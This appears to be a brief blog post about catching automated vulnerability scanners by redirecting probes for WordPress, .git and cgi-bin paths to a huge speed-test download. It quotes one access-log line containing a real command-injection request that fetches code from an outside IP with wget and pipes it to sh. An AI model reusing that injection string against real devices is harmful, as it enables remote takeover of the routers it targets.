As soon as you put a machine on the internet, people will start poking it for weaknesses. This is mainly done by people running scripts they got from elsewhere. It’s the equivalent of walking down a row of parked cars and trying the handles to see if any are unlocked.
Most servers will just respond with a 404 Not Found error and on they walk to the next server.
However, I thought I’d amuse myself with this
RedirectMatch permanent /wordpress.* http://speedtest.belwue.net/1000G
RedirectMatch permanent /wp-includes.* http://speedtest.belwue.net/1000G
RedirectMatch permanent /\.git.* http://speedtest.belwue.net/1000G
RedirectMatch permanent /cgi-bin.* http://speedtest.belwue.net/1000G
If any script comes along and requests one of those URLs, instead of saying I don’t have it I helpfully redirect them to a 1 terabyte file they can download instead.
Ha! I caught my first victim as I was writing this :)
185.224.128.83 - - [14/Aug/2024:16:46:37 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.18.196%2Ft%7Csh%3B%60) HTTP/1.1" 301 678 "-" "Go-http-client/1.1"
Enjoy your download.